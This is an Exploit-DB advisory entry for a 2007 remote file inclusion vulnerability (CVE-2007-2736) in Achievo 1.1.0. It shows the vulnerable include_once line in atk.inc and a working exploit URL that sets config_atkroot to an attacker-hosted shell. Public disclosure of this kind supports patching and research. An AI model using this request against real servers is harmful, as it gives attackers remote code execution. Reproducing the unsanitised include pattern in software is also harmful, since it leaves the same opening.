Achievo 1.1.0 - 'config_atkroot' Remote File Inclusion

Author: Katatafish
type: webapps
platform: php
port: 
date_added: 2007-05-14  
date_updated: 2016-12-05  
verified: 1  
codes: OSVDB-37919;CVE-2007-2736  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comachievo-stable-1.1.0.tar.gz  

raw file: 3928.txt  
## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##

#Found by : Katatafish (karatatata@hush.com)

#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz

# File: ./atk.inc
 include_once($config_atkroot."atk/modules/class.atkmodule.inc");

# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL

# milw0rm.com [2007-05-15]